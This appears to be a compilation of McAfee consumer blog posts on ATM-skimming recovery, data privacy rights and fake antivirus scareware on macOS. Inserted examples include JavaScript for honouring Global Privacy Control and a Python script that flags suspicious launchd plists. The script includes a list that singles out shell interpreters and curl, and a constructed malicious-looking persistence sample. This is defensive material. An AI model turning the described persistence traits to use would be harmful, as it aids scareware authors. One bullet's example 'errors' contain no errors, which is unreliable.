    7. Monitor your accounts closely. Review all bank and credit card statements for the next few months. Set up account alerts for transactions over a certain amount, and consider using your bank’s mobile app to check account activity daily during this period.
    8. File additional reports if identity theft occurs. If criminals used your card information for identity theft beyond just card fraud, file a report with the Federal Trade Commission and consider filing a police report. The FTC provides a personalized recovery plan and pre-filled forms for creditors.
    9. Update automatic payments. Replace your old card information with your new card details for any automatic payments, subscriptions, or saved payment methods with online retailers to avoid service interruptions.
    10. Keep detailed records. Document all communications with your bank, including dates, times, representative names, and reference numbers. Save copies of dispute forms and any correspondence related to the fraud investigation.

    Final thoughts

    Protecting yourself from ATM skimming requires ongoing attention, but you’re now equipped with the knowledge to use ATMs confidently and securely—perform a visual inspection, do the wiggle test, review the keypad, and be aware of your surroundings. Trust your instincts. If something feels wrong or looks suspicious about an ATM, consider finding an alternative location. Your intuition is a valuable tool in recognizing potentially compromised machines.

    Share these ATM safety practices with your family members and friends to strengthen their security as well. Take a moment to revisit your bank’s fraud protection guidelines and ensure you understand their notification procedures for suspicious activity. Your financial institution can partner with you in preventing fraud, so don’t hesitate to reach out with questions about their latest security features.

    The post Essential Tips to Avoid ATM Skimming appeared first on McAfee Blog.

    Celebrate Data Privacy Day by Applying These Best Practices

    By: McAfee

    This is a critical time for our personal security, particularly in terms of privacy and personal information. A battle is being waged over our data by multiple parties, from criminal hackers to advertisers and data brokers. This article provides essential tips to help you protect the personal details you want to keep private and stay safe online.

    The Battle for Your Personal Data

    Criminal hackers and identity thieves want to use your name to open new accounts, which they can turn into cash. They may try to obtain credit cards, utility services, or mobile phones using your good credit. In other cases, these same thieves take over existing bank or credit card accounts and completely empty them out. Identity theft affects millions of Americans each year, with over 1.4 million reports filed to the FTC in recent years and an estimated 15 million victims annually.

    Online Tracking and Advertising

    Online, advertisers and marketers use tracking cookies and sophisticated technologies to gather information about you and your web browsing habits. They can then offer you products or services based on the profile they’ve developed. Almost every major website contains cookies, and they are changing the way advertising is created and targeted.

    The Federal Trade Commission (FTC) has explored options, such as “Do Not Track” mechanisms, to allow consumers to opt out of data collection; however, these efforts have faced significant challenges. Browser-based solutions have been proposed, but the advertising industry’s partnerships with major media and tech companies have made comprehensive opt-out mechanisms difficult to implement effectively.

    Social Media Privacy Risks

    Social media companies compete for your attention and your information because user data is valuable to advertisers and marketers. Whatever you post in your profile is broken down, cataloged, and disseminated. Your name, age, address, email, phone number, contacts, income status, job description, and other personal details are of use to anyone targeting your wallet.

    However, legitimate advertisers aren't the only ones targeting social networks. Criminal hackers and identity thieves are accessing your data, either through the public portion of these sites or by breaching the platforms themselves. The bad guy uses your profile information to guess the answer to your password reset question, or to trick you into opening your wallet or entering login credentials that might allow them to take over your existing accounts.

    What is Data Privacy Day?

    Amid all these developments, the National Cyber Security Alliance established Data Privacy Day, an annual awareness event observed every January 28, which encourages you to take control of your personal information and understand your online privacy rights. Initially launched in 2008, this important day coincides with the anniversary of the signing of Convention 108, the first legally binding international treaty dealing with privacy and data protection.

    As a U.S. consumer, Data Privacy Day matters to you more than ever because your personal information has become incredibly valuable and, unfortunately, increasingly vulnerable. Every day, you share personal details through social media, shopping websites, mobile apps, and online services, often without realizing how this information is collected, used, or shared.

    The observance of this day highlights several key risks that affect your daily digital life. Data misuse occurs when companies collect more information than necessary or use your personal details in ways you haven’t explicitly approved. Identity theft remains a significant threat, with criminals using stolen personal information to open fraudulent accounts, make unauthorized purchases, or even file fake tax returns. Additionally, data breaches continue to expose millions of Americans’ personal information each year, from social security numbers to financial details.

    What makes Data Privacy Day empowering is its focus on actionable steps you can take immediately. Rather than feeling overwhelmed by privacy concerns, you can use this day as motivation to review and strengthen your digital privacy habits. The day is a reminder that privacy and data protection aren’t just technical concepts. They’re fundamental rights that help you maintain control over your digital life.

    Data privacy core concepts

    Before delving deeper into regulations and best practices, let’s take a look at the core concepts. The Federal Trade Commission defines data privacy as the reasonable expectation that your personal information will be handled appropriately by the organizations that collect it. It is your fundamental right to control how your personal information is collected, used, shared, and retained by the companies and services you interact with every day. At its heart, data privacy ensures that you have a say in what happens to details about your life, from your name and email address to your online shopping preferences, videos watched, social media usage, and down to your browsing habits and location data.

    Your data follows a path that starts with collection, when companies gather information directly from you, such as when you fill out a form, or indirectly through cookies and tracking pixels. The use phase refers to how organizations process your information, whether to improve their services, target advertisements, or analyze user behavior. Sharing involves passing your data to third parties, from business partners to data brokers. Retention determines how long your information stays in their systems, often well beyond the end of your active relationship with the service.

    Throughout this process, your information is governed by three principles of modern data privacy:

    • Consent means companies should ask for your permission before collecting and using your personal information, and this permission should be freely given, specific, and informed. You shouldn’t have to accept data collection just to use basic services.
    • Control gives you the power to access, correct, delete, or restrict the use of your personal data.
    • Transparency requires companies to clearly explain their data practices in plain language, rather than burying them in lengthy legal documents.

    When Netflix asks if you want to share viewing data to improve recommendations, that’s consent in action. When Google lets you download your search history or delete location tracking, you’re exercising control. When Apple’s privacy labels show exactly what data an app collects, that’s transparency working for you.

    Your data privacy rights

    Under the comprehensive privacy laws that a growing number of U.S. states have enacted (discussed below), you have several key rights that put you in control of your personal information:

    • Right to know: You can request information about what personal data companies collect about you, how it’s used, and who it is shared with.
    • Right to access: You can obtain copies of the personal information companies have collected about you.
    • Right to delete: You can request companies to delete your personal information, with certain exceptions.
    • Right to opt out: You can opt out of the sale or sharing of your personal data for targeted advertising.
    • Right to correct: You can request corrections to inaccurate personal information.
    • Right to non-discrimination: Companies cannot penalize you for exercising your privacy rights.

    Data privacy and data protection

    Data protection and data privacy are sometimes used interchangeably, but they serve different but complementary roles in keeping your personal information safe:

    • Data privacy is about your rights and choices in how your personal information gets collected, used, and shared. It’s less about technical security and more about giving you control over what happens with your data.
    • Data protection is about securing your information from threats such as hackers, breaches, and technical failures. It is the digital equivalent of a bank vault, using technical and organizational safeguards to keep your data safe from unauthorized access, theft, or loss.

    Here are some everyday scenarios that show how these concepts work differently:

    • Your encrypted backup files represent data protection in action. Even if someone gains access to your backup drive without the proper key, encryption makes your photos, documents, and files unreadable. The technical safeguard protects your data from misuse.
    • Choosing who can see your location on social media is a privacy decision. When you decide what personal information to share and with whom, you are exercising control over your data.
    • Your password manager provides data protection by securely storing and encrypting your login credentials, making them nearly impossible for criminals to steal and use.
    • Declining to provide your phone number when signing up for a shopping account is a privacy choice. You’re limiting the amount of personal information that gets collected about you in the first place.

    Data privacy laws

    As a consumer, your data privacy rights translate into real, actionable benefits you can use today. However, the effectiveness of these protections often depends on enforcement and your own awareness of the tools available to you.

    The U.S. privacy landscape

    U.S. state privacy laws are increasingly giving you the right to know what personal information companies collect, the right to delete your data, and the right to opt out of having your information sold or shared.

    America’s privacy framework is built on sector-specific federal regulations combined with increasingly robust state legislation. This approach means your rights and protections can vary significantly depending on where you live and what type of data is being collected.

    At the federal level, key laws include the Health Insurance Portability and Accountability Act (HIPAA) for healthcare data, the Fair Credit Reporting Act (FCRA) for credit information, and the Children’s Online Privacy Protection Act (COPPA) for children under 13 years. While these provide important protections in specific areas, they leave significant gaps in comprehensive consumer data privacy protection.

    To fill these gaps, California established crucial precedents through the California Consumer Privacy Act (CCPA) and the California Privacy Rights Act (CPRA), which amended and expanded it. Other states are also now enacting comprehensive privacy laws, including Virginia's Consumer Data Protection Act, the Colorado Privacy Act, Connecticut's Data Privacy Act, and Utah's Consumer Privacy Act. Each provides residents with fundamental rights over their personal data while requiring businesses to implement stronger protection measures.

    Extra care for highly sensitive personal data

    Sensitive personal data represents the most valuable and vulnerable information about you—the details that, if compromised, could cause significant harm to your finances, safety, and peace of mind. Unlike basic contact information, sensitive data requires stronger legal protections and your extra vigilance because of its potential for misuse.

    Health Information

    Your health information deserves particular care because it reveals intimate details about your physical and mental well-being. HIPAA protections cover medical records, but health data collected by fitness apps, mental health platforms, or wellness websites may not receive the same legal safeguards.

    Biometric data

    Biometric data—your unique physical characteristics such as fingerprints, voice patterns, or facial features—can’t be changed if stolen, making this information particularly precious.

    Children’s Information

    Children’s data receives special attention under privacy laws because minors can’t meaningfully consent to data collection. The Children’s Online Privacy Protection Act requires explicit parental consent before companies can collect information from children under 13, while some state laws extend these protections to older teens.

    GDPR for the global services

    Meanwhile, the European Union's General Data Protection Regulation (GDPR) applies to any service offered to people in the EU, wherever the company is based, and some global services such as Google, Facebook, or Netflix have extended GDPR-style controls to users worldwide to maintain consistent data practices.

    GDPR personal data includes obvious identifiers such as your name, email address, phone number, and national identification numbers. But it also covers less obvious information, such as IP addresses, device IDs, location data, and even your online shopping habits or social media activity. Essentially, if data points can be combined to identify you or build a profile of you, they qualify as personal data under GDPR standards. This broad definition gives you stronger control over your information and has influenced many U.S. companies to offer the same rights to all users, not just those in the European Union.

    Whether a company follows GDPR, California’s privacy laws, or other frameworks, the core principle remains the same: you deserve transparency and control over your personal information.

    How can you celebrate Data Privacy Day?

    Your privacy rights are expanding, but exercising them effectively requires staying informed and taking proactive steps. As we celebrate Data Privacy Day, we recommend you participate by taking simple, practical steps to exercise your data privacy rights.

    Review your privacy settings regularly

    Start with the platforms and services you use most frequently. Look for the privacy or data protection section in your account settings and review the information being collected and shared.

    Submit data access requests

    Many major companies now provide online forms or dedicated email addresses for privacy requests. Take advantage of these to understand what data they have about you. Popular platforms such as Google, Facebook, and Amazon have streamlined processes for data downloads.

    Opt out of data sales

    Look for “Do Not Sell My Personal Information” links on websites, typically found in footers or privacy policy pages. You can also use opt-out tools such as the Global Privacy Control browser setting that automatically signals your opt-out preferences.

    Use data broker opt-out services

    Many data brokers now offer opt-out mechanisms, though the process can be time-consuming. Consider using privacy services that handle multiple opt-out requests on your behalf.

    Monitor your digital footprint

    Regularly search for your name and personal information online. Set up Google Alerts for your name and key personal details to stay informed about new appearances of your information. In addition, monitor your credit reports for unauthorized changes, and use identity monitoring services that watch for your personal information appearing in data breaches or on the dark web.

    Use reputable websites and tools

    When sharing sensitive information online, verify that websites use https:// in the address bar and read privacy policies before providing personal details. Keep in mind that https:// only protects data in transit between you and the site; it says nothing about how the site stores, uses, or shares your information once it arrives, which is what the privacy policy covers. Only use well-established, privacy-focused health, financial, and communication platforms with a strong track record of privacy and data protection.

    Oversee your kids’ online activities

    For children’s data, maintaining active oversight will help you stay ahead of potential problems in their online activities. Review the apps and websites they use, understand what information these platforms collect, and use parental controls to limit data sharing. Teach your children about privacy and the risks of sharing personal information online.

    Everyday tips to maintain your privacy

    Protecting your personal data doesn’t have to feel like a giant, technical project. Most privacy wins come from small, repeatable habits that you can do in minutes to shrink your digital footprint, and use the internet on your terms.

    • Limit what you share online: Review your social media privacy settings and share only what’s necessary to reduce your exposure to identity thieves and the potential for your data to be used against you.
    • Review your location permissions: For location data, regularly review and delete location history from your devices and disable location sharing for apps that don’t need it.
    • Crumble that cookie: You can block cookies in your browser settings. Blocking all cookies may prevent you from using certain websites, so blocking third-party cookies while allowing first-party ones is a practical middle ground that stops most cross-site tracking.
    • Stay private while browsing: Use a virtual private network from a reputable, reliable company, especially when using unsecured Wi-Fi in public places such as cafes, airports, and libraries. A VPN hides your traffic from the local network and your IP address from the sites you visit, but the VPN provider can see that traffic, so choose one whose logging policy you trust.

    Your personal information has value, so make sure you’re getting a fair return through services that respect your privacy.

    FAQs about data privacy

    What counts as personal data?

    Personal data includes any information that can directly or indirectly identify you. This covers obvious details such as your name, email, and Social Security number, but also extends to IP addresses, device identifiers, location data, browsing history, and even inferences about your preferences or behavior.

    How can I opt out of data sale and sharing?

    On company websites, look for “Do Not Sell My Personal Information” or “Your Privacy Choices” links, usually found in the footer. You can also use the Global Privacy Control browser signal to send opt-out requests automatically. Services such as DeleteMe or manual removal requests can help you reclaim control of your information from data brokers and multiple platforms.
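    The Global Privacy Control signal mentioned here and under "Opt out of data sales" above is a concrete mechanism: a supporting browser or extension sends the request header Sec-GPC: 1 and exposes navigator.globalPrivacyControl to page scripts, and a site that honors it publishes a /.well-known/gpc.json file. The following is an added example, not McAfee's code, showing how a website could detect and honor the signal on both the server and the browser side; the header objects, the tag configuration and the function names are illustrative assumptions, and the sample requests are constructed.

```javascript
// Added example (not from the original article): honoring the Global Privacy
// Control (GPC) opt-out signal. Supporting browsers send "Sec-GPC: 1" on every
// request and expose navigator.globalPrivacyControl === true to scripts.
// Request headers, config shape and function names here are assumptions.

// Server side: decide from the request headers whether this visitor has
// opted out of sale/sharing. Header names are case-insensitive, so normalize.
function gpcOptOut(headers) {
  const entry = Object.entries(headers).find(
    ([name]) => name.toLowerCase() === "sec-gpc"
  );
  const value = entry ? entry[1] : undefined;
  // The spec defines exactly one meaningful value: "1". Anything else
  // (absent, "0", "true") must be treated as "no signal", never as consent.
  return String(value === undefined ? "" : value).trim() === "1";
}

// Apply the opt-out to a page's ad/analytics configuration: when GPC is set,
// disable sale/sharing and drop third-party tags that would share data.
function applyGpc(headers, config) {
  const optOut = gpcOptOut(headers);
  return {
    ...config,
    sellOrShare: optOut ? false : config.sellOrShare,
    thirdPartyTags: optOut
      ? config.thirdPartyTags.filter((tag) => !tag.sharesData)
      : config.thirdPartyTags,
  };
}

// A site that honors GPC should also serve /.well-known/gpc.json so that
// browsers, users and regulators can verify the commitment.
function gpcWellKnown(lastUpdate) {
  return JSON.stringify({ gpc: true, lastUpdate });
}

// Browser side: read the signal from the navigator object (undefined in
// browsers without GPC support, so only an explicit true counts).
function browserGpcEnabled(nav) {
  const n = nav !== undefined ? nav : (typeof navigator !== "undefined" ? navigator : {});
  return n.globalPrivacyControl === true;
}

// Constructed sample configuration and requests (not real traffic).
const sampleConfig = {
  sellOrShare: true,
  thirdPartyTags: [
    { name: "first-party-analytics", sharesData: false },
    { name: "ad-retargeting-pixel", sharesData: true },
  ],
};

const withGpc = applyGpc({ "Sec-GPC": "1", "User-Agent": "example" }, sampleConfig);
const withoutGpc = applyGpc({ "user-agent": "example" }, sampleConfig);

console.log(withGpc.thirdPartyTags.map((t) => t.name));    // ["first-party-analytics"]
console.log(withoutGpc.thirdPartyTags.map((t) => t.name)); // both tags
console.log(gpcWellKnown("2025-01-28"));
```

    In a real deployment the server-side check runs in request middleware before any tag configuration is rendered into the page, and the opt-out should be recorded against the user's session so it persists even if a later request arrives without the header.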

    What should I do after a data breach?

    First, change passwords for affected accounts and enable two-factor authentication. Next, monitor your credit reports and bank statements for unusual activity. If Social Security numbers or financial data were involved, place a credit freeze with all three major credit bureaus. Sign up for identity monitoring services if offered by the breached company. Be sure to document everything and report identity theft to the FTC if you notice fraudulent activity.

    How do I spot dark consent patterns?

    Watch for manipulative design tricks that push you toward sharing more data. Red flags include pre-checked boxes for marketing emails, making privacy-friendly options harder to find or understand, using confusing language that hides the intent, or making it much easier to accept all cookies than to customize your preferences. Legitimate consent should be freely given, specific, informed, and easily withdrawn.

    What rights do I have over my personal data?

    Depending on your location, you may have the right to know what data companies collect about you, request copies of your data, correct inaccurate information, delete your data, and opt out of its sale or use for targeted advertising. Some laws also give you the right to data portability and protect you from discrimination for exercising these rights. Check if your state has comprehensive privacy laws or if you’re covered by GDPR.

    What essential resources can I read to stay informed?

    To stay current with your privacy rights and the evolving legal landscape, bookmark these authoritative resources:

    Final thoughts

    Data Privacy Day serves as an important annual reminder, but your commitment to privacy and data protection shouldn’t end when January 28th passes. The digital threats we face continue to evolve throughout the year, making ongoing vigilance essential to protect your personal details.

    Small, consistent habits can make a profound difference in your digital security. By regularly updating your passwords, enabling multi-factor authentication, reviewing privacy settings on your accounts, and staying informed about emerging threats, you create layers of protection that work together to safeguard your information.

    Invest in McAfee+ identity protection, which includes proactive identity surveillance to monitor subscribers’ credit and personal information, as well as access to live fraud resolution agents who help subscribers work through the process of resolving identity theft issues.

    The post Celebrate Data Privacy Day by Applying These Best Practices appeared first on McAfee Blog.

    Stop Fake Antivirus Popups on Your Mac

    By: McAfee

    Mac users often say, “I don’t have to worry about viruses. I have a Mac!” But that sense of safety is outdated. Macs face real threats today, including scareware and fake antivirus pop‑ups designed specifically for macOS. One of the most infamous examples is the Mac Defender family, which appeared around 2011 under names like “Mac Defender,” “Mac Security,” and “Mac Protector,” luring users with fake security alerts and then installing malicious software.

    These scams have long targeted Windows PCs and later expanded to Macs, using similar tactics: bogus scan results, alarming pop-ups, and fake security sites that push users to download “protection” software or pay to remove nonexistent threats. Once installed, these programs can bombard you with persistent warnings, redirect you to unwanted or explicit sites, and may even try to capture your credit card details or other sensitive information under the guise of an urgent upgrade.

    In this blog, we’ll take a closer look at how you become a target for these fake antivirus pop‑up ads, how to remove them from your Mac, and practical steps you can take to block them going forward.

    What is fake antivirus software?

    Fake antivirus software is malicious software that tricks you into believing your Mac is infected with viruses or security threats when, in fact, it isn’t. These deceptive programs, also known as rogue antivirus or scareware, masquerade as legitimate security tools to manipulate you into taking actions that benefit cybercriminals.

    On your Mac, fake antivirus pop-up ads typically appear as urgent browser warnings or system alerts claiming to have detected multiple threats on your computer. These fraudulent notifications often use official-looking logos, technical language, and alarming messages like “Your Mac is infected with 5 viruses” or “Immediate action required” to create a sense of urgency and panic.

    These scams manipulate you by:

    • Requesting payment: They’ll prompt you to purchase their “premium” software to remove the fake threats, often charging $50-200 for worthless programs.
    • Providing fake phone numbers: The pop-up ads will display fake support numbers you can call for “immediate technical assistance.”
    • Requesting personal information: Once you call the number, the scammer on the other end of the line will request your credit card details, personal information, or remote access to your computer.
    • Encouraging malicious downloads: The ads will trick you into downloading actual malware disguised as security software.

    Tactics scammers use to infect your device with fake antivirus pop-up ads

    Fake antivirus popups are almost always the result of a sneaky delivery method designed to catch you off guard. Scammers rely on ads, compromised websites, misleading downloads, and social engineering tricks to get their scareware onto your Mac without you realizing what’s happening. Let’s take a look at the common ways these scams spread so you can avoid them.

    • Deceptive online advertisements: Fake antivirus software often appears through misleading ads that claim your Mac is infected or at risk. These ads can appear on legitimate websites and use urgent language, such as “Your Mac has 3 viruses!” to create a sense of panic.
    • Malvertising campaigns: Cybercriminals purchase legitimate advertising space and inject malicious code that automatically redirects you to fake antivirus download pages. This can happen even on reputable websites you trust.
    • Drive-by downloads: Simply visiting a compromised website can trigger automatic downloads of fake antivirus software without your knowledge. Your Mac may store these files in your Downloads folder, where they wait for you to accidentally open them.
    • Bundled software installers: Fake antivirus programs often hide in free applications from unofficial sources. During installation, you might unknowingly agree to install additional “security” software that’s actually malicious.
    • Pirated applications and media: Illegal downloads of software, movies, or music frequently contain fake antivirus programs as hidden payloads. These files install malware alongside the content you wanted.
    • Typosquatted domains: Scammers register URLs that are slightly altered or are misspellings of legitimate websites, such as Apple-support.com. These typosquatted links are sent via phishing emails that claim to have detected a virus on your Mac. If you click on the fake link, you could be infected with malware that displays alarming security warnings and promotes fake antivirus downloads.
    • Fake technical support pages: Scammers create convincing replicas of Apple Support or legitimate security company websites that promote fake antivirus solutions. These pages often include official-looking logos and professional language to appear trustworthy.
    • Browser notification abuse: Some websites request permission to send you notifications, then later spam you with fake virus alerts. Clicking on these notifications could download fake antivirus software that mimics macOS system alerts.
    • Malicious configuration profiles: Fake antivirus installers may request permission to download configuration profiles onto your device, granting them deep access to your Mac’s settings and network traffic. Once installed, these profiles will redirect your browser traffic through malicious servers and display fake security warnings.

    Elements of a fake virus alert

    Fake virus alerts use a mix of visual tricks and psychological pressure to push you into clicking, calling, or paying before you have time to think. This section breaks down the common elements scammers use in these alerts so you can recognize a fake warning instantly and ignore it.

    • Blaring alarm and full-screen browser takeover: If your browser suddenly goes full-screen with flashing red warnings and audio alarms, you’re looking at a scam designed to panic you into taking immediate action. Real Mac security notifications never lock your entire screen or play loud, startling sounds. Legitimate macOS alerts appear as small, quiet dialogs in the upper-right corner of your screen.
    • Urgent countdown timers: The high-pressure countdown clocks claiming your Mac will be “permanently damaged” in minutes are artificial psychological tactics that scammers use to pressure you and prevent you from thinking clearly. Apple’s real security notifications give you time to review and respond thoughtfully.
    • Spelling and grammar mistakes: Fake alerts often contain telltale errors such as “Your computer has been infected” or “Immediate action required.” Apple invests heavily in polished, professional communications to produce macOS security dialogs with error-free language that reflects the company’s attention to detail.
    • Requests for gift cards or cryptocurrency payments: Any request for unconventional payment methods is an immediate indicator of a scam. Apple will never ask you to purchase iTunes gift cards, Amazon cards, or Bitcoin to “clean” your Mac. Authentic Apple security software uses traditional payment methods through official app stores or verified websites.
    • Suspicious phone numbers for “tech support”: Scammers use phone numbers that connect you directly with fraudsters who will remotely access your Mac or extract personal information. Legitimate macOS alerts don’t include phone numbers to call for immediate help. Apple provides support through official channels, which are clearly marked on their website.
    • Generic or mismatched company logos: Fake alerts often use distorted Apple logos, outdated designs, or generic “security shield” graphics instead of authentic branding. Real macOS notifications maintain consistent visual elements that match your system’s appearance and Apple’s official style guidelines.
    • Misleading URLs: Scam pages often use suspicious addresses such as “apple-security-center.net” or “mac-virus-removal.com.” Authentic security alerts from macOS appear in System Settings or from apps you’ve knowingly installed from the official Apple App Store.
    • Persistent pop-up ads that won’t close: Fake virus warnings often spawn multiple windows, reappear after being closed, or make it difficult to exit. Authentic macOS security features respect your control and don’t bombard you with alerts.
    • Warnings that bypass System Settings: Fake alerts typically appear only as web pages or unauthorized pop-ups that don’t connect to your actual system security settings. Genuine Mac security notifications integrate with your system properly, appearing through official macOS notification systems or System Settings under Privacy & Security.
    • Claims “hundreds of viruses found” without scanning: Fake alerts instantly claim to have found dozens or hundreds of viruses without performing a legitimate scan. Real security scans, however, take time to complete and provide specific, verifiable results about actual threats.

    Examples of fake antivirus software and pop-ups

    • Mac “Defender” variants: This notorious family of fake antivirus programs includes variants such as Mac Security, Mac Protector, and Mac Guard, appearing through deceptive search results or malicious websites. They display fake system scans that allegedly found threats on your Mac to trick you into paying $50-$99 for a useless antivirus tool. Once you enter payment information, cybercriminals will access your financial data and may continue charging your card for bogus services.
    • Generic “antivirus” popups: These fake alerts have generic names such as Antivirus 10, Mac Antivirus Pro, or Advanced Mac Cleaner. These ads pop up while you browse, often accompanied by loud alarms and urgent countdown timers, claiming your Mac is infected and demanding immediate action. The scam journey involves clicking the alert, downloading malicious software disguised as security tools, and potentially compromising both your system and personal information.

    Verify that an antivirus alert is fake

    If you’re not sure whether an antivirus warning is real or just scareware, a quick verification is the safest next step. There are steps you can take and settings on your macOS you can check without putting your Mac at further risk.

    1. Disconnect from the internet immediately: When you suspect a fake antivirus alert, the first step is to break the connection between your Mac and the internet to stop malicious processes from communicating with remote servers or downloading additional threats.
    2. Check the URL and certificate details: If the alert appeared in your web browser, examine the web address carefully. Legitimate security warnings from Apple or trusted vendors will come from official domains, not URLs with misspellings or random characters.
    3. Verify the app’s developer signature and source: To verify that the developer signatures are from recognized companies, open Finder, navigate to Applications, and locate the security software. Right-click the application and select “Get Info” to view the developer information. In macOS Ventura, Sonoma, and Sequoia, you can also go to Apple Menu > About This Mac > More Info > System Report > Applications to view information about the software.
    4. Review configuration profiles and login items: Navigate to Apple Menu > System Settings or System Preferences > Privacy & Security to find and remove any configuration profiles you didn’t install. Next, check Login Items & Extensions or Users & Groups > Login Items for suspicious applications set to launch automatically.
    5. Inspect LaunchAgents and LaunchDaemons folders: Fake antivirus software often installs persistent components in these system folders. Go to Finder > Go to Folder > ~/Library/LaunchAgents, /Library/LaunchAgents, and /Library/LaunchDaemons. Fake antivirus files typically have .plist extensions.
    6. Check browser extensions and notification permissions: Fake antivirus alerts often originate from malicious browser extensions or abusive notification permissions. Review your extensions and remove those you didn’t install or revoke permissions that might be generating fake security alerts.
    7. Run legitimate security scans from trusted sources: Use reputable security tools downloaded only from the Apple App Store or directly from the websites of legitimate vendors to scan your system. Apple’s built-in XProtect and Malware Removal Tool (MRT) run automatically, but you can also use the system’s First Aid feature in Disk Utility to check for file system issues.
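Step 5 above tells you to look in the LaunchAgents and LaunchDaemons folders but not what a suspicious .plist looks like. The following is an added example, not code from the McAfee post: it parses a launchd property list with Python's standard plistlib and flags the traits worth a second look (a program parked in a temp, shared or hidden directory, a com.apple.* label pointing outside Apple's system paths, RunAtLoad plus KeepAlive, or an interpreter launched in place of an app). The two sample plists, their labels and their paths are constructed for illustration.

```python
"""Triage launchd property lists (LaunchAgents/LaunchDaemons) for scareware persistence.

Added example, not code from the McAfee post. Given the bytes of a .plist from one
of the folders named in step 5, it extracts the program launchd will run and flags
traits worth a closer look. Both sample plists below are constructed; their labels
and paths are made up for illustration.
"""
import plistlib
import re
from dataclasses import dataclass, field
from pathlib import Path

# Programs shipped by Apple itself live under these prefixes.
APPLE_PREFIXES = ("/System/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/", "/bin/", "/sbin/")
# Legitimate installers almost never park a long-running program here.
SUSPICIOUS_PREFIXES = ("/tmp/", "/private/tmp/", "/var/tmp/", "/Users/Shared/")
# A dot-directory under a user's home is a common place to hide a binary.
HIDDEN_IN_HOME = re.compile(r"^/Users/[^/]+/\.")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python3", "perl", "curl"}


@dataclass
class Finding:
    label: str
    program: str
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def program_of(item: dict) -> str:
    """launchd runs either Program or ProgramArguments[0]."""
    if "Program" in item:
        return str(item["Program"])
    args = item.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def triage_plist(data: bytes) -> Finding:
    """Parse one plist and collect reasons it deserves review (empty list = nothing odd)."""
    item = plistlib.loads(data)
    label = str(item.get("Label", "<no Label>"))
    program = program_of(item)
    finding = Finding(label=label, program=program)
    if not program:
        finding.reasons.append("no Program or ProgramArguments")
        return finding
    if program.startswith(SUSPICIOUS_PREFIXES) or HIDDEN_IN_HOME.match(program):
        finding.reasons.append("program lives in a temp, shared or hidden directory")
    if label.startswith("com.apple.") and not program.startswith(APPLE_PREFIXES):
        finding.reasons.append("com.apple.* label but program is not in an Apple system path")
    if item.get("RunAtLoad") and item.get("KeepAlive"):
        finding.reasons.append("RunAtLoad + KeepAlive: always running and restarted if killed")
    if Path(program).name in INTERPRETERS:
        finding.reasons.append(f"launches an interpreter or downloader ({program}) instead of an app binary")
    return finding


def triage_directory(folder: str) -> list:
    """Triage every .plist in a folder, e.g. ~/Library/LaunchAgents (not used by the samples)."""
    return [triage_plist(p.read_bytes()) for p in sorted(Path(folder).expanduser().glob("*.plist"))]


# Constructed sample 1: an ordinary vendor updater (no flags expected).
LEGIT_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Applications/Example.app/Contents/MacOS/ExampleUpdater</string>
    <string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
</dict></plist>"""

# Constructed sample 2: the shape a scareware persistence item tends to take.
ROGUE_AGENT = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
  <key>Label</key><string>com.apple.security.helper</string>
  <key>ProgramArguments</key><array>
    <string>/Users/Shared/.cache/SecurityHelper</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for sample in (LEGIT_AGENT, ROGUE_AGENT):
        f = triage_plist(sample)
        verdict = "REVIEW" if f.suspicious else "ok"
        print(f"{verdict:6} {f.label} -> {f.program}")
        for r in f.reasons:
            print(f"       - {r}")
```

A flag from this script is a prompt to check the program's developer signature (step 3), not proof of malware; legitimate third-party agents do sometimes use RunAtLoad and KeepAlive.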

    Your action plan when a fake virus warning pops up

    The moment a fake virus warning pops up, scammers are hoping you’ll react fast, click a button, call a number, or download their “fix.” However, the safest approach is the opposite: take a moment to think, don’t interact with the alert, close the browser, and clear any files it may have tried to leave behind. Here’s exactly what to do right away to stay safe.

    1. Stay calm and don’t interact with the alert: Resist the urge to click anywhere on the fake virus warning pop-up window, including any “X” buttons, “OK” buttons, or phone numbers. These elements are designed to trick you into downloading malware or connecting with scammers. Avoid touching your mouse or trackpad while the alert is displayed.
    2. Force-quit your browser immediately: Press Command + Option + Esc to open the Force Quit Applications window, select your browser (Safari, Chrome, Firefox, or Edge), and click “Force Quit.” If the pop-up has taken over your entire screen, try pressing Command + Q to quit the browser directly. This breaks the connection to the malicious website without triggering any hidden downloads.
    3. Clear your browser’s site data and disable notifications: When you restart your browser, immediately go to Preferences/Settings and clear your browsing data, cookies, and cache. Then navigate to the Notifications section and remove permissions for suspicious websites to block the fake antivirus from returning.
    4. Check and remove any malicious configuration profiles: Go to System Settings > Privacy & Security > Profiles or System Preferences > Profiles, and look for profiles you didn’t install, especially those with generic names or suspicious publishers. Select unknown profiles and click the minus (-) button to remove them.
    5. Restart your Mac to clear temporary threats: A simple reboot helps clear any temporary malicious processes that might be running in memory. After restarting, check your desktop and Downloads folder, move unfamiliar files to the Trash, and empty it completely.
    6. Update your macOS and browser to the latest versions: Go to System Settings > General > Software Update and install macOS updates. Update your browsers as well to protect against the latest fake antivirus tactics and browser exploits.
    7. Run a full security scan with trusted software: Use reputable security software to scan your entire system for lingering threats. Focus on applications that have been specifically designed for Mac and have current threat definitions.
    8. Monitor and validate financial statements: If you provided payment information to what you now suspect was fake antivirus software, immediately check your bank and credit card statements for unauthorized charges. Report these fraudulent charges to your financial institutions and place fraud alerts on your accounts over the next few weeks.
    9. Report the scam to protect others: Report the fake antivirus website to the Federal Trade Commission and to Google’s Safe Browsing if you encountered it through search results. You can also report it to your browser manufacturer. Your report helps security teams identify and block these threats more quickly, thereby protecting other Mac users from falling victim to the same scam.

    Final thoughts

